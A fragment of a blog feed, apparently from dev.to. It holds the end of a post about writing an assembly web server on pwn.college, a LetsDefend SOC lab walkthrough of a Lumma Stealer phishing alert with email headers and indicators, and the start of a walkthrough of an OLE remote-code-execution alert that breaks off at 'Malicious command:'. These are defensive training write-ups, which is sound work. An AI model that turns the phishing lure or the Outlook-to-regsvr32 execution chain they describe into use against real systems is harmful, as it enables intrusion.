&lt;p&gt;That's not arrogance. That's earned confidence. Before &lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;, I wasn't sure I could write anything meaningful in assembly. Now I know I can build a concurrent web server from scratch, no &lt;code&gt;libc&lt;/code&gt;, no runtime, just me and the kernel.&lt;/p&gt;

&lt;p&gt;Once you've done that, everything else feels possible.&lt;/p&gt;

&lt;h4&gt;
  
  
  What the previous modules gave me
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Syscall convention: number in &lt;code&gt;rax&lt;/code&gt;, arguments in &lt;code&gt;rdi&lt;/code&gt;, &lt;code&gt;rsi&lt;/code&gt;, &lt;code&gt;rdx&lt;/code&gt;, then &lt;code&gt;r10&lt;/code&gt;, &lt;code&gt;r8&lt;/code&gt;, &lt;code&gt;r9&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Stack discipline: &lt;code&gt;sub rsp, N&lt;/code&gt; to allocate, &lt;code&gt;add rsp, N&lt;/code&gt; to deallocate&lt;/li&gt;
&lt;li&gt;Register preservation: &lt;code&gt;rbx&lt;/code&gt;, &lt;code&gt;r12&lt;/code&gt;-&lt;code&gt;r15&lt;/code&gt; survive function calls&lt;/li&gt;
&lt;li&gt;Debugging: &lt;code&gt;gdb&lt;/code&gt; and &lt;code&gt;strace&lt;/code&gt; are your eyes into a running program&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  What the web server module taught me
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Socket syscalls create network endpoints&lt;/li&gt;
&lt;li&gt;HTTP is just text over TCP, parsed byte by byte&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;fork()&lt;/code&gt; is concurrency, simple, reliable, and ancient&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;\r\n\r\n&lt;/code&gt; is the most important 4-byte sequence in HTTP&lt;/li&gt;
&lt;li&gt;File descriptors are just integers, and they get copied on &lt;code&gt;fork()&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Nothing is handed to you, but everything is possible&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  On getting help (the honest version)
&lt;/h4&gt;

&lt;p&gt;Using AI on a few challenges didn't give me the answers, it gave me direction. I still wrote the code. I still understood why it worked. And I made sure I could explain the solution in my own words before moving on.&lt;/p&gt;

&lt;p&gt;I think that's the right way to use AI in learning: as a tutor, not a crutch. Ask it to explain a concept, not to write the code for you. The difference matters.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Full Journey (94 Challenges)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before the web server (75 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your First Program (5)&lt;/li&gt;
&lt;li&gt;Computer Memory (7)&lt;/li&gt;
&lt;li&gt;The Stack (4)&lt;/li&gt;
&lt;li&gt;Software Introspection (12)&lt;/li&gt;
&lt;li&gt;Output and Input (6)&lt;/li&gt;
&lt;li&gt;Control Flow (7)&lt;/li&gt;
&lt;li&gt;Assembly Assortment (4)&lt;/li&gt;
&lt;li&gt;Assembly Crash Course (30)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The web server (11 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Exit → &lt;code&gt;exit&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Socket → &lt;code&gt;socket&lt;/code&gt; syscall, finding AF_INET and SOCK_STREAM&lt;/li&gt;
&lt;li&gt;Bind → &lt;code&gt;bind&lt;/code&gt; syscall, manual &lt;code&gt;sockaddr_in&lt;/code&gt;, endianness&lt;/li&gt;
&lt;li&gt;Listen → &lt;code&gt;listen&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Accept → &lt;code&gt;accept&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Static Response → hardcoded &lt;code&gt;write&lt;/code&gt;, byte-by-byte strings&lt;/li&gt;
&lt;li&gt;Dynamic Response → &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt;, file serving&lt;/li&gt;
&lt;li&gt;Iterative GET Server → infinite loop&lt;/li&gt;
&lt;li&gt;Concurrent GET Server → &lt;code&gt;fork&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Concurrent POST Server → body parsing, &lt;code&gt;open&lt;/code&gt; with O_CREAT&lt;/li&gt;
&lt;li&gt;Web Server → GET + POST + concurrency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;After the web server (8 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Debugging Refresher (8)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Total: 94 challenges.&lt;/strong&gt; One dojo. One working web server in assembly.&lt;/p&gt;

&lt;h3&gt;
  
  
  If You Build Systems That Actually Matter
&lt;/h3&gt;

&lt;p&gt;I don't know who's reading this. But if you work on operating systems, embedded devices, aerospace or defense software, cybersecurity tooling, or anything where "it just works" isn't good enough, you need "I understand exactly why it works", then you know why this matters.&lt;/p&gt;

&lt;p&gt;I built this because I wanted to understand. Now I do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Try It Yourself
&lt;/h3&gt;

&lt;p&gt;The Computing 101 dojo is free on &lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;. Start with "Your First Program." See how far you get.&lt;/p&gt;

&lt;p&gt;If you get stuck, and you will, don't look for full solutions. Use &lt;code&gt;strace&lt;/code&gt;. Use &lt;code&gt;gdb&lt;/code&gt;. Read the man pages. Figure it out. That's where the learning happens.&lt;/p&gt;

&lt;p&gt;And if you're truly stuck after genuinely trying? Ask for help, but make sure you learn from it. That's what I did.&lt;/p&gt;

&lt;h3&gt;
  
  
  Acknowledgments
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt; and Arizona State University for building this. The checker program for never lying to me. The 75 assembly programs before this one that made it possible. And the AI tutor I asked for help on fewer than 5 challenges, not for answers, but for explanations that unblocked me.&lt;/p&gt;

&lt;h3&gt;
  
  
  Some resources they recommend:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=iyAyN3GFM7A&amp;amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;amp;index=1" rel="noopener noreferrer"&gt;LiveOverFlow&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ike.mahaloz.re/1_introduction/introduction.html" rel="noopener noreferrer"&gt;Ike: The Systems Hacking Handbook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/mytechnotalent/Reverse-Engineering-Tutorial" rel="noopener noreferrer"&gt;Reverse Engieering tutorial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ost2.fyi/Arch1001" rel="noopener noreferrer"&gt;Architecture 1001 - OpenSecurity2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://open.umn.edu/opentextbooks/textbooks/733" rel="noopener noreferrer"&gt;x86-64 book&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://squallygame.com/" rel="noopener noreferrer"&gt;game&lt;/a&gt; to teach you x86 assembly and one to &lt;a href="https://oooverflow.io/zero-is-you/" rel="noopener noreferrer"&gt;stress test your knowledge&lt;/a&gt;!&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://soc.me/interfaces/x86-prefixes-and-escape-opcodes-flowchart" rel="noopener noreferrer"&gt;flowchart&lt;/a&gt; of x86 prefix and escape opcodes.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.felixcloutier.com/x86/" rel="noopener noreferrer"&gt;Detailed x86 reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;I built this because I wanted to understand. Now I do.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;VENI. VIDI. VICI.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;AD MELIORA!&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Here's my &lt;a href="https://www.linkedin.com/in/hitanshu-gedam/" rel="noopener noreferrer"&gt;LinkedIN&lt;/a&gt; if you wanna connect!&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>networksec</category>
      <category>server</category>
      <category>discuss</category>
    </item>
    <item>
      <title>LetsDefend SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Mon, 27 Apr 2026 18:01:11 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc338-lumma-stealer-dll-side-loading-via-click-fix-phishing-p8l</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc338-lumma-stealer-dll-side-loading-via-click-fix-phishing-p8l</guid>
      <description>&lt;p&gt;This time we are investigating another CRITICAL level alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjazo4iuxgr3kyf62a5nv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjazo4iuxgr3kyf62a5nv.png" alt="takeownership" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with taking ownership of the alert and then head to the Investigation Channel and create a case.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd1szw9z49zu9tezrycv3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd1szw9z49zu9tezrycv3.png" alt="createdcase" width="712" height="526"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's start the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2433w2g0kq8qz5mnqgzc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2433w2g0kq8qz5mnqgzc.png" alt="playbok1" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with our instruction to parse email&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k4u3pgry2t16u33pd0i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k4u3pgry2t16u33pd0i.png" alt="parseemail" width="800" height="430"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight email"&gt;&lt;code&gt;&lt;span class="nt"&gt;From&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; update@windows-update[.]site&lt;/span&gt;
&lt;span class="nt"&gt;To&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; dylan[@]letsdefend.io&lt;/span&gt;
&lt;span class="nt"&gt;Subject&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Upgrade your system to Windows 11 Pro for FREE&lt;/span&gt;
&lt;span class="nt"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Mar, 13, 2025, 09:44 AM&lt;/span&gt;
&lt;span class="nt"&gt;Action&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Allowed&lt;/span&gt;
&lt;span class="nt"&gt;SMTP Address&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; 132.232.40.201&lt;/span&gt;
&lt;span class="nt"&gt;Attachment&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; No files, but there are URLs present.&lt;/span&gt;
&lt;span class="nt"&gt;Suspicious&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Yes, because there were multiple 'Update Now' buttons, indicating a phishing attempt&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgmwtdhm90i4oxu926fur.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgmwtdhm90i4oxu926fur.png" alt="attachment" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If we copy the url from the email and look it up on VirusTotal we see the following:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gk9oiaojooi3t1yenic.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gk9oiaojooi3t1yenic.png" alt="virustotal" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;11 out of 91 vendors flag this URL as malicious.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsxzwyzhy2sowxajc4pta.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsxzwyzhy2sowxajc4pta.png" alt="malicious" width="800" height="477"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next question is:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8djyy2y2g25tg4g9rsb3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8djyy2y2g25tg4g9rsb3.png" alt="deliveredkya" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flmwibnti1csj0elnn7wd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flmwibnti1csj0elnn7wd.png" alt="alowed" width="800" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The the alert details, under the Action field, shows the value set to Allowed — confirming that the email was successfully delivered to the recipient.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fr322da8xm5k9naln2l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fr322da8xm5k9naln2l.png" alt="delivered" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffummpxhc1w2e639ndc90.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffummpxhc1w2e639ndc90.png" alt="delete" width="800" height="261"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next task is to delete the email&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgog4eluno8958a2ua0ds.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgog4eluno8958a2ua0ds.png" alt="emailsecurity" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we move to the Email Security tab, look for the particular email and delete it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh28u31p533ji9mgbdjgv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh28u31p533ji9mgbdjgv.png" alt="deleted" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkc0q3c4syurfzrvw3oi6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkc0q3c4syurfzrvw3oi6.png" alt="playbook3" width="800" height="422"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we need to find out if Dylan accessed the malicious URL. We move to &lt;br&gt;
Endpoint Security and see if the URL was accessed&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftevoihp900ql841gb9h5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftevoihp900ql841gb9h5.png" alt="accessed" width="800" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We see that the URL was, in fact, accessed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxa2u29815zhfwm4j6f6o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxa2u29815zhfwm4j6f6o.png" alt="playbook4" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is to contain the host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7m5x49rddklf0iby196j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7m5x49rddklf0iby196j.png" alt="contained" width="800" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The machine is contained.&lt;/p&gt;

&lt;p&gt;Our next step is to add the artifacts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjfofm64ilzniuetx3c2e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjfofm64ilzniuetx3c2e.png" alt="artifacts" width="800" height="518"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After putting Analyst's notes, we finish the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fep8f89nqrc1qeqp46676.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fep8f89nqrc1qeqp46676.png" alt="finish" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw5r2ybw5vzahbf1zv5g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw5r2ybw5vzahbf1zv5g.png" alt="close" width="588" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert on the monitoring page.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 19:18:10 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298-3k77</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298-3k77</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyykib4spsrzr7cfsk0fb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyykib4spsrzr7cfsk0fb.png" alt="taking ownership" width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the alert we will be working with. &lt;br&gt;
Let's start with taking the ownership of this alert/&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr49b9at2zr012dtpynko.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr49b9at2zr012dtpynko.png" alt="tookownership" width="702" height="510"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now let's go ahead to the Investigation channel and create a case for this alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lhy8tai6uktiuzgq0fc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lhy8tai6uktiuzgq0fc.png" alt="nvd" width="800" height="441"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the screenshot of what we see on the NIST National Vulnerability Database about the CVE of this alert.&lt;br&gt;
link: &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-21298" rel="noopener noreferrer"&gt;https://nvd.nist.gov/vuln/detail/CVE-2025-21298&lt;/a&gt;&lt;br&gt;
The severity has a score of 9.8 which means it is CRITICAL.&lt;/p&gt;

&lt;p&gt;This vulnerability allows attackers to execute remote code via specially crafted OLE (Object Linking and Embedding) objects without user interaction. Knowing this, I knew I needed to look for unusual child processes spawning from Office applications or script executions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsnbjzloq33xway5flgh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsnbjzloq33xway5flgh.png" alt=" " width="800" height="420"&gt;&lt;/a&gt;&lt;br&gt;
I went to the Endpoint Security tab and searched for the SMTP IP, looking through the "Processes" logs and here is what I found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;cmd.exe was executed at 08:06:08 AM with Outlook.exe as it's Parent Process which is quite a red flag since an email client is RARELY needed to spawn a command shell prompt&lt;/li&gt;
&lt;li&gt;at 08:06:25 AM, cmd.exe spawned regsvr32.exe&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Malicious command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
